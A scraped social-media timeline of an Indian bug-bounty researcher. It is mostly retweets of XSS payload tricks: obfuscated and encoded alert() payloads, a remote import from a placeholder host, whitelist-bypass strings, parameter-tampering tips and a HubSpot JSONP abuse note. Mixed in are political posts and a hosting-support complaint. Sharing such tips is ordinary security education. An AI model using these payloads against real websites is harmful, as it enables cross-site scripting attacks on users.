Gaurav Kumar(GDATTACKER)

4.7K posts

Gaurav Kumar(GDATTACKER)

@gdattacker

New Delhi, India Bergabung Mayıs 2014

3.6K Mengikuti881 Pengikut

Gaurav Kumar(GDATTACKER) me-retweet

KNOXSS@KN0X55·2d

XSS PoC Styles - Noob alert(1) - Bug Hunter alert(document.domain) - WAF Ninja d=document,b='`',d['loca'%2B'tion']='javascrip'%2B't%26colon;aler'%2B't'%2Bb%2Bd.domain%2Bb - Red Teamer import('//domain.tld/xss2rce.js') - KNOXSS

English

269

Gaurav Kumar(GDATTACKER) me-retweet

KNOXSS@KN0X55·3d

The "JavaScript:" XSS payload offers ample room for code obfuscation, as it can be encoded multiple times. JavaScript:alert(1) 👇🏾 JavaScript:%61lert(1) 👇🏾 JavaScript:&#37&#54&#49lert(1) 👇🏾 JavaScript:%26%2337%26%2354%26%2349lert(1) Lab gym.brutelogic.net/?p05=%3CIframe…

English

106

Gaurav Kumar(GDATTACKER) me-retweet

bugcrowd@Bugcrowd·20 May

Quick bug bounty TIPS! ➡️ verified=false → true, “true”, "True", "TRUE", 1, "1", “yes” ➡️ /v3/users/1234 → v1, v0, internal, beta, legacy ➡️ quantity=100 → -1, 0, 9999999999, 1.82376931348623157e+308 ➡️ role=”user” → “admin”, “”, null, “system” ➡️ /admin → /Admin, /ADMIN, /aDmIn Try them now! ✅ Do you have something to add? 👇

English

366

10.3K

Gaurav Kumar(GDATTACKER) me-retweet

KNOXSS@KN0X55·21 May

Crash Course on JavaScript for XSS Hunters Worth watching, liking and sharing!😎 youtube.com/watch?v=lkIFF4…

YouTube

English

2.5K

Gaurav Kumar(GDATTACKER) me-retweet

KNOXSS@KN0X55·22 May

Some Neat XSS Tricks </<K><Svg Onload=alert(1)> </<Kno XSS="><Svg Onload=alert(1)> <!<K><Svg Onload=alert(1)> <!<Kno XSS="><Svg Onload=alert(1)> Test them here: gym.brutelogic.net/?p05=any

English

Gaurav Kumar(GDATTACKER) me-retweet

Cockroach is Back@Cockroachisback·21 May

Dharmendra Pradhan must resign!

English

3.1K

18.3K

72.6K

3.6M

Gaurav Kumar(GDATTACKER) me-retweet

Nicolas Krassas@Dinosn·20 May

A Claude Code skill bundle for bug hunting and external red-team work - 51 skills, 15 slash commands, 574+ disclosed-report patterns curated across 24 vulnerability classes, plus enterprise identity + infrastructure attack matrices. github.com/elementalsouls…

English

143

656

26K

Gaurav Kumar(GDATTACKER) me-retweet

KNOXSS@KN0X55·19 May

XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC gym.brutelogic.net/?p05=%3CJavaSc… Ref brutelogic.net/research/docs/…

English

1.3K

Gaurav Kumar(GDATTACKER) me-retweet

KNOXSS@KN0X55·20 May

XSS shot for whitelists, might get executed in DOM if attribute is evaluated. 1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt;>

English

820

Gaurav Kumar(GDATTACKER)@gdattacker·20 May

@ganaseclabs @D0rkerDevil Wow awesome discovery

English

GanaSec@ganaseclabs·20 May

New blog from GanaSec: The 2017 Ghost in the Time Machine Hunting IOTimeSyncFamily on macOS Our Researcher Ashish Kunwar (@D0rkerDevil) independently discovered CVE-2026-28969 - a use-after-free race condition in Apple's IOTimeSyncFamily kernel extension.

English

4.1K

Gaurav Kumar(GDATTACKER)@gdattacker·20 May

@HelleLyngSvends @Erroristotle the bjp owned a huge army of trollers and content management groups who do all possible tweeks and tricks but keep fighting. Truth can't escape for long time

English

Helle Lyng@HelleLyngSvends·19 May

Throughout all day I have struggled to log onto my Instagram account. Now I have been suspended. It is a small prize to pay for press freedom, but I’ve never experienced it before.

English

3.2K

8.5K

40.1K

Gaurav Kumar(GDATTACKER)@gdattacker·20 May

#cockroachjantaparty

QHT

Gaurav Kumar(GDATTACKER)@gdattacker·20 May

If you are a cockroach write - Dharmendra Pradhan must resign!

English

Gaurav Kumar(GDATTACKER)@gdattacker·16 May

Details of tickets has been shared via dm as requested

English

Gaurav Kumar(GDATTACKER)@gdattacker·16 May

@digitalocean what's going on account stuck at verification not getting reply on support ticket but the amount is being used from account help me out

English

Gaurav Kumar(GDATTACKER) me-retweet

Marouane Mouhtadi@Mar0_0uane·15 May

During recent testing on a HubSpot-powered target, I needed a JSONP primitive to complete a DOM XSS chain. One interesting behavior: HubSpot CMS exposes a built-in endpoint in this format: `/_hcms/forms/embed/v3/form/{portalId}/{formId}?callback=alert` Example : `REDACTED. com/_hcms/forms/embed/v3/form/22544793/f411e5de-1b8b-4b19-8e6d-fe003d08cc8b?callback=alert` It's a JSONP endpoint that wraps the response in whatever function name you pass. Just load it as